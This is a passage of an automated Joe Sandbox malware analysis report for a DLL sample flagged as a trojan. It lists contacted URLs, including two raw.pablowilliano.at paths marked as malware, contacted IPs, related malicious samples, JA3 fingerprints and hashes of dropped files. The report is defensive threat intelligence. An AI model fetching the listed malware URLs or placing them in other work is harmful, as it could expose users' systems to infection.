http://raw.pablowilliano.at/ds3WDeXoOEmk7Y/QQuMPDNsrQWDpsNbTxUBm/9C_2Ffsfwo9FuQBR/xjorKLEJMlfL0	loaddll32.exe, 00000000.00000002.1094450430.0000000001220000.00000002.00000001.sdmp, regsvr32.exe, 00000002.00000002.1095495336.00000000030A0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.1095379754.0000000003110000.00000002.00000001.sdmp, rundll32.exe, 00000005.00000002.1095372641.0000000002F80000.00000002.00000001.sdmp	true	Avira URL Cloud: malware	unknown
https://outlook.com/	de-ch[1].htm.6.dr	false		high
http://raw.pablowilliano.at/OH175Zchtr5XCiZumX3nwAg/_2FAbOw7Yf/Z3HrOA2tCuHkK0wx_/2BSl8k36vM_2/BmUwT9	{F0E7C154-C49D-11EB-90EB-ECF4BBEA1588}.dat.4.dr	true	Avira URL Cloud: malware	unknown
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2	~DFF80766C3FDE4D880.TMP.4.dr	false		high
https://www.stroeer.com/fileadmin/com/StroeerDSP_deviceStorage.json	iab2Data[1].json.6.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://cdn.cookielaw.org/vendorlist/iabData.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	false		high
https://www.msn.com/de-ch/homepage/api/pdp/updatepdpdata"	de-ch[1].htm.6.dr	false		high
https://cdn.cookielaw.org/vendorlist/iab2Data.json	55a804ab-e5c6-4b97-9319-86263d365d28[1].json.6.dr	false		high
https://onedrive.live.com/?qt=mru;Aktuelle	52-478955-68ddb2ab[1].js.6.dr	false		high
https://cdn.flurry.com/adTemplates/templates/htmls/clips.html"	auction[1].htm.6.dr	false		high
https://www.msn.com/de-ch/?ocid=iehp	~DFF80766C3FDE4D880.TMP.4.dr	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
104.20.185.68	geolocation.onetrust.com	United States	13335	CLOUDFLARENETUS	false
34.95.62.189	authd.feronok.com	United States	15169	GOOGLEUS	false
87.248.118.22	edge.gycpi.b.yahoodns.net	United Kingdom	203220	YAHOO-DEBDE	false
151.101.1.44	tls13.taboola.map.fastly.net	United States	54113	FASTLYUS	false

Private

IP
192.168.2.1

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	429332
Start date:	03.06.2021
Start time:	20:57:44
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 10m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	1.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	38
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.evad.winDLL@43/153@26/5
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 14.5% (good quality ratio 13.8%) Quality average: 79.3% Quality standard deviation: 28.9%
HCA Information:	Successful, ratio: 74% Number of executed functions: 70 Number of non-executed functions: 133
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, ielowutil.exe, RuntimeBroker.exe, backgroundTaskHost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 204.79.197.200, 13.107.21.200, 20.49.157.6, 52.147.198.201, 104.43.139.144, 13.64.90.137, 92.122.145.220, 88.221.62.148, 204.79.197.203, 92.122.213.187, 92.122.213.231, 65.55.44.109, 152.199.19.161, 23.57.80.37, 205.185.216.42, 205.185.216.10, 168.61.161.212, 52.255.188.83, 20.82.210.154, 104.43.193.48, 20.82.209.104, 92.122.213.247, 92.122.213.194, 52.155.217.156, 20.54.26.129 Excluded domains from analysis (whitelisted): iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, e11290.dspg.akamaiedge.net, iris-de-ppe-azsc-neu.northeurope.cloudapp.azure.com, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, au.download.windowsupdate.com.hwcdn.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, dual-a-0001.a-msedge.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, skypedataprdcolcus16.cloudapp.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, cs9.wpc.v0cdn.net, store-images.s-microsoft.com-c.edgekey.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, e12564.dspb.akamaiedge.net, go.microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, skypedataprdcolwus17.cloudapp.net, ie9comview.vo.msecnd.net, a-0003.a-msedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, cds.d2s7q6s2.hwcdn.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, skypedataprdcoleus16.cloudapp.net, skypedataprdcoleus17.cloudapp.net, a-0001.a-afdentry.net.trafficmanager.net, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:00:25	API Interceptor	1x Sleep call for process: rundll32.exe modified
21:01:50	API Interceptor	1x Sleep call for process: regsvr32.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.20.185.68	racial.dll	Get hash	malicious	Browse
	shook.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	7Ek6COhMtO.dll	Get hash	malicious	Browse
	wl7cvArgks.dll	Get hash	malicious	Browse
	SyoFYHpnWB.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	shook.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	soft.dll	Get hash	malicious	Browse
	eJskD7UIlM.dll	Get hash	malicious	Browse
	racial.dll	Get hash	malicious	Browse
	b8c033482291a3c073483fc23df165d39fd79c6f22144.dll	Get hash	malicious	Browse
	7FZXcAHGWK.dll	Get hash	malicious	Browse
	7FZXcAHGWK.dll	Get hash	malicious	Browse
87.248.118.22	http://us.i1.yimg.com	Get hash	malicious	Browse	us.i1.yimg.com/favicon.ico
	http://www.prophecyhour.com	Get hash	malicious	Browse	us.i1.yimg.com/us.yimg.com/i/yg/img/i/us/ui/join.gif
	http://t.eservices-laposte.fr/TrackActions/NzA0YmE3MTRiOTg4NGEyM2E4Njc4ZDIyNGVjNmJmMTYzMDQxMzhmZTVjNzEyMDU2OTMxM2JkODcxMDUzMmYxY2ZlZWFjODU5ZDUyYzM3MGQxNzM2YTU1NjRlOTA0YWUzZmY4Mjc4MDQ2YWMzY2ZkZDA5MWQ0MWE0OWJmODc4NWM2ZDA2YWI4MmJmYmRkNGNjZTQyNmRlZjRkNjMyM2NmNTUyM2FlZDI5NmVjM2UzMmUyZThhMjEwMzk0MzYxMzI1MmExZjBiMmU5ZWNjMDg0OTY3YTZhYWZkOTMzMGQxZWI0YjBkZmM1MjBkNzQyM2QzMTY4MjgyOTJjM2QwZGUxZmVkZTU1MjhiZTE5YjdhY2MwNTQ0ZjdkMGJmODNjNzYwODY2ODY5M2RhZjgwMjAzMzcxNzM5MjBjM2QxOTI0MzQ5ODhhMGNlNWYwNjlmZGY5YjcwNDQ0ZGQ4MjM3ZGM0Njk4M2U0MWRjYjE0ZTRiNDk3NWM1MDAyYjYxZGIzMGI2NzllMjg4ZTYxNjhlZWViYzM1ZDcwNDJhYjg4NjhlNTA5NjAyZTc3MTJkODExM2NhZGRiYTYwM2Y3NDRmNmY5MDY5MTU0N2I3NGE1MzhiMzA5OGFhYmVjZjJkN2VhNDQzMjljNzM5MWU1ODM1ZDg1YzViYjVmODMzZGNmYWRmODc3MGM3MTZkZGU2ZjFkYWU4NTNlNGQ0OTFkYTM5ZmQzOA	Get hash	malicious	Browse	yui.yahooapis.com/3.4.1/build/yui/yui-min.js
	http://www.knappassociatesinc.com	Get hash	malicious	Browse	www.flickr.com/photos/knappassociatesinc/
	https://skphysiotherapy.ca/FEDWIRE/	Get hash	malicious	Browse	cookiex.ngd.yahoo.com/ack?xid=E0&eid=XjSTxQAAAemDVVL0
	Doc.htm	Get hash	malicious	Browse	l.yimg.com/a/i/ww/met/yahoo_logo_us_061509.png

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
contextual.media.net	racial.dll	Get hash	malicious	Browse	23.57.80.37
	shook.dll	Get hash	malicious	Browse	23.57.80.37
	racial.dll	Get hash	malicious	Browse	23.57.80.37
	racial.dll	Get hash	malicious	Browse	23.57.80.37
	racial.dll	Get hash	malicious	Browse	23.57.80.37
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	racial.dll	Get hash	malicious	Browse	184.30.24.22
	shook.dll	Get hash	malicious	Browse	184.30.24.22
tls13.taboola.map.fastly.net	racial.dll	Get hash	malicious	Browse	151.101.1.44
	shook.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	7Ek6COhMtO.dll	Get hash	malicious	Browse	151.101.1.44
	SyoFYHpnWB.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44
	shook.dll	Get hash	malicious	Browse	151.101.1.44
	racial.dll	Get hash	malicious	Browse	151.101.1.44

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
YAHOO-DEBDE	racial.dll	Get hash	malicious	Browse	87.248.118.22
	racial.dll	Get hash	malicious	Browse	87.248.118.23
	racial.dll	Get hash	malicious	Browse	87.248.118.23
	racial.dll	Get hash	malicious	Browse	87.248.118.22
	racial.dll	Get hash	malicious	Browse	87.248.118.22
	racial.dll	Get hash	malicious	Browse	87.248.118.22
	racial.dll	Get hash	malicious	Browse	87.248.118.23
	racial.dll	Get hash	malicious	Browse	87.248.118.23
	soft.dll	Get hash	malicious	Browse	87.248.118.23
	racial.dll	Get hash	malicious	Browse	87.248.118.23
	racial.dll	Get hash	malicious	Browse	87.248.118.23
	2wLzQHrIRu.dll	Get hash	malicious	Browse	87.248.118.23
	r.dll	Get hash	malicious	Browse	87.248.118.23
	ELKx2TKs6n.exe	Get hash	malicious	Browse	87.248.118.23
	7FZXcAHGWK.dll	Get hash	malicious	Browse	87.248.118.22
	u0riJmNc0T.dll	Get hash	malicious	Browse	87.248.118.23
	f2fR2CiaRu.exe	Get hash	malicious	Browse	87.248.118.23
	71bc262977cf6112541d871c3946ab6112d64297ef5f8.dll	Get hash	malicious	Browse	87.248.118.23
	runsys32.dll	Get hash	malicious	Browse	87.248.118.23
	3275690.dll	Get hash	malicious	Browse	87.248.118.22
CLOUDFLARENETUS	MT103.exe	Get hash	malicious	Browse	172.67.188.154
	soa5.exe	Get hash	malicious	Browse	162.159.133.233
	soa5.exe	Get hash	malicious	Browse	162.159.134.233
	racial.dll	Get hash	malicious	Browse	104.20.185.68
	Sealant Specialists, Inc. Projects #2021-Proposal #19100.html	Get hash	malicious	Browse	104.16.18.94
	68Aj4oxPok.exe	Get hash	malicious	Browse	104.26.0.222
	Ysur2E8xPs.exe	Get hash	malicious	Browse	104.26.0.222
	gL6kmfUvVr.exe	Get hash	malicious	Browse	172.67.181.37
	shook.dll	Get hash	malicious	Browse	104.20.185.68
	racial.dll	Get hash	malicious	Browse	104.20.184.68
	racial.dll	Get hash	malicious	Browse	104.20.184.68
	racial.dll	Get hash	malicious	Browse	104.20.185.68
	racial.dll	Get hash	malicious	Browse	104.20.184.68
	racial.dll	Get hash	malicious	Browse	104.20.185.68
	racial.dll	Get hash	malicious	Browse	104.20.184.68
	racial.dll	Get hash	malicious	Browse	104.20.184.68
	racial.dll	Get hash	malicious	Browse	104.20.184.68
	racial.dll	Get hash	malicious	Browse	104.20.185.68
	racial.dll	Get hash	malicious	Browse	104.20.184.68
	racial.dll	Get hash	malicious	Browse	104.20.185.68

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
9e10692f1b7f78228b2d4e424db3a98c	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	Sealant Specialists, Inc. Projects #2021-Proposal #19100.html	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	CkGJ5BGlKp.exe	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	Xerox scan.html	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	shook.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44
	racial.dll	Get hash	malicious	Browse	87.248.118.22 104.20.185.68 151.101.1.44

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\E5F0NRSV\www.msn[2].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.469670487371862
Encrypted:	false
SSDEEP:	3:D90aKb:JFKb
MD5:	C1DDEA3EF6BBEF3E7060A1A9AD89E4C5
SHA1:	35E3224FCBD3E1AF306F2B6A2C6BBEA9B0867966
SHA-256:	B71E4D17274636B97179BA2D97C742735B6510EB54F22893D3A2DAFF2CEB28DB
SHA-512:	6BE8CEC7C862AFAE5B37AA32DC5BB45912881A3276606DA41BF808A4EF92C318B355E616BF45A257B995520D72B7C08752C0BE445DCEADE5CF79F73480910FED
Malicious:	false
Preview:	<root></root>

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\URW0GA4Q\contextual.media[1].xml Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	3246
Entropy (8bit):	4.924352405707097
Encrypted:	false
SSDEEP:	96:dbyyyQyyyyyVy66466H6ccScc5cc5ccR+RgcRfRgccRfRgcU:r
MD5:	7947DE6BA05ECEE5B4938AC067BC7969
SHA1:	B6F8BFB8EC4A64D5ADA748356904AAEF6720CE0D
SHA-256:	289B61A54C9ECCC8EEC5CEAC3A684A481CDD239FC1A582436BDB5BDA71419A99
SHA-512:	7DFA1F043CE8AED27EF1D59B3CB33BDC592CB7A165F99020EE4EE6D570A14FF252B3C1A3BE1A7DE3441C37C60C1E47F2A1AB97D65CC3EFEDCEFC748355FF1E09
Malicious:	false
Preview:	<root><item name="mntest" value="mntest" ltime="2152856416" htime="30890154" /></root><root></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /><item name="mntest" value="mntest" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /></root><root><item name="HBCM_BIDS" value="{}" ltime="2182856416" htime="30890154" /><item name="mntest" value="mntest" ltime="2202856416" htime="30890154"

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{B10F1F20-C49D-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	391144
Entropy (8bit):	2.569862464641999
Encrypted:	false
SSDEEP:	384:rZg9uVQDj7WEDhf0fR0GPnGKrcN+xKeGLk3NYNGotS5zGtjVi3zYMpxrGtwERYf1:QWPfxtoQ
MD5:	FFA13D52EF97BF456E0EE07DEECB1BFB
SHA1:	7D05CB11AF26AFA06AD5CD7530980BF414D4F0CC
SHA-256:	BFB3A97938BEA051CE5F428D6EB61264B495389946752EDE36BB97F6B7FB7C7A
SHA-512:	D9E07DD3BC5BA37D4DEACE827512FB9D17D305EC9A3D4BD72BFF291E609719A90FA7B3024B686BBCF96BA4047086199C0582EAD70C6067F1BC32BABA58B71668
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{02B5BFEA-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28160
Entropy (8bit):	1.9268075044302364
Encrypted:	false
SSDEEP:	192:rYZvQn6xkAj3NL23HVW3qM3qpp5fmVplzfWUA:rYo6iC0cbKnejD6
MD5:	63D219E77DFFEE46C549152B43CF00F7
SHA1:	DE80DD6146EAF2701E105FC82089989B6219F154
SHA-256:	2993B82070F8AE4C79087A6CD8CEAB10EFA49244D5E2B64A0057A59CE350F582
SHA-512:	EA6B50BDA310D5962F3E7CD0DACEA0DE093BC9EC577D17A5F45088528502457043A8CA0D8210B85E487084A541625B93F5D4865BDC6504A7314E75369738F2FA
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BC39C1-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28172
Entropy (8bit):	1.9255654697212203
Encrypted:	false
SSDEEP:	192:rGZhQR6TkFj12pWvM7tQbK7ArlQbK7bK7AiA:rC2sYhsYkxEoSE8os
MD5:	57EC87B0E85728106E24A8B5297FA225
SHA1:	4E7075CDFAEDA3EFC2BBC112281AA4CC8ADE386E
SHA-256:	6CC25015092F4DB37E6C5CB03993C30345F6FECD3CEC23AE2F7DEDD0588D6D28
SHA-512:	70D0D30071F5904573782DFAEEE9169829E73A32C4F1CA8BB4583BD2CD4CC85747482FF961E2874D6127E91A537BE70CF83BF48561A6DAE8B1F501E8836270D7
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{09BC39C3-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9168364474632198
Encrypted:	false
SSDEEP:	192:rUZ/QL6BkgjV2lWWMGZRcVtG1RcScVtAA:rE4OyiM8/O2Vte2bVtT
MD5:	4DD6C14AE8F0E3D4187408F94B2E67CA
SHA1:	13B67EBF6E63071400F37C621F1034EC6E8BA784
SHA-256:	2B9475F51F09C88EC6437D51C80D9CD10E9C53B501949FC7C3C575DFA95E5FA0
SHA-512:	DE5F3DB6D81CF1DFE31AC35D97C67A8414946FFDB49526A30485F78299AEDEC27675AE9E8878BF87DB25BC5E87AD6F3DB665BEDAD9128661D3B1A0A3887791A7
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1081BFD7-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28152
Entropy (8bit):	1.9198592889215937
Encrypted:	false
SSDEEP:	192:rPZ8QQ62kWjR2BWzMzxHeCTxY9llHeCT3eCTxY9XA:rxV73QAwwlFCXF5CQ
MD5:	832511113AF5134E08EC42670425457D
SHA1:	A38764317B6C2F904D566CCAFABDFBD90BC05A90
SHA-256:	D647BE909F79A8F4EBBB3904D7CE890C8F715E3B20F227D6AB29EFDF774502BD
SHA-512:	788330A3FCBD7920DB63B17EF8E988F1727D032D077957CFFE18DD3AF7CBD85517EED34DD753078427B1B30068A1E978A7ACD28CBC5AD151A983B83939EE2AB0
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{17550680-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28124
Entropy (8bit):	1.9082461097504217
Encrypted:	false
SSDEEP:	192:rcZnQ36VkEjx2NWcMc9V+8tRlV8+8t2HA:rcQKe2gkZYB1g0g
MD5:	EAC50705AEBF6ADAB71E89E0FCC879EC
SHA1:	4919F00518D0115E0FA4B474E5E61CC04E2D77CE
SHA-256:	B5FD13701290BDD5EB150F8BC44ABF37D665557C077DDC2A6D54154123F8C957
SHA-512:	C92097FC75C0ECFBDAB1F73687793CD4971CBF7A7125A701A73B730B36FFC5D43A4F279F98101FFFC286C0946FAB9BFEA0259B5982E5E82D92D9CDA02F72F8FE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{17550682-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28128
Entropy (8bit):	1.9076426484456896
Encrypted:	false
SSDEEP:	192:rYZfQ769kSjp2JW8MQRyKZP2jEMyHKZP20r:rYY+mM445QMAM80
MD5:	EB4EAE1C839E1512E9D6D4182F92637F
SHA1:	5828A51BE2E56CB188EB40E42C0123B57AC17298
SHA-256:	68A42A1E82471D41CCD050BD7DD2A74866AEDB148A1432B8E548627D9D95441B
SHA-512:	7E024FF885CAFA37192C719EDA1C9F19B5BA506A6C98275971A11022891DE109FE425D0299BA5A7C52EFB505004609013B16E636372B560EB26960BF59AFB9F7
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{17550684-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	28144
Entropy (8bit):	1.9189546581103236
Encrypted:	false
SSDEEP:	192:rJZiQG6kkVXjtcs2tGWWtRMtlZ/Ftp1/ItSA:r/PRJVTtc7tGNtqtH/FZ/ID
MD5:	2CB81867467A4E83465E58DCCC1F940B
SHA1:	057714F9275B19321C52F3CCA666012581469019
SHA-256:	FBEEBA133A01FDA68EE709DD2D033ED4AF34694562C8E7E3A877DF872CE3D202
SHA-512:	E6D2550577DDBD0347942B4AD2EEE3BA4A1C399609B6B1D57D1837FC2E0C53D887092D35BD24713841B9D3AC7ACE741C38F1ED38E0D906A3301C49D4FBCF78FA
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{1E26C961-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27584
Entropy (8bit):	1.911009355359917
Encrypted:	false
SSDEEP:	192:rMZHQU6Sk4je2aWOMSp0lUZCV0lUZwl5A:rMw/L6VZnSf8fH
MD5:	8116175D1D4FEE2ECF2887F82074ACFE
SHA1:	076A18DF2BC9FF1D0EB21D97FC1B283174400B6F
SHA-256:	FE127F96A3294763CC7BECDAF731A72FA61290EE4006B7C8FCCC7B06E7D008E5
SHA-512:	17F0981222EC9FBE5560383634E8BCE32928228EC2F4263AE04E1229198DA248415D100EFB908E15F4D65E366334749C794AEA391EB62D63A9C85B28EF25AE3E
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\{24DDE3A7-C49E-11EB-90EB-ECF4BBEA1588}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	27564
Entropy (8bit):	1.9064637653067722
Encrypted:	false
SSDEEP:	192:r7Z4Qc6qkBjx2kWLMrN3lsXyl3lsXxlJA:rNhnDdgT4huauu
MD5:	6FF1579141D1DEC15756C635E76A9766
SHA1:	6DBE0933E727F26E2CEA396F6CE5E45F628CAEA3
SHA-256:	3B6F5506F2B945F972C0285338A6884EE379033806D483DB4353F9C837E8C2FC
SHA-512:	E69BDC73EA4850042779F468519C048AA08FB9F080A9FB5D70839A90C5CC30ED0C6157230ADF953840B706C5074694082845C554586AD65EB449611B92868B97
Malicious:	false
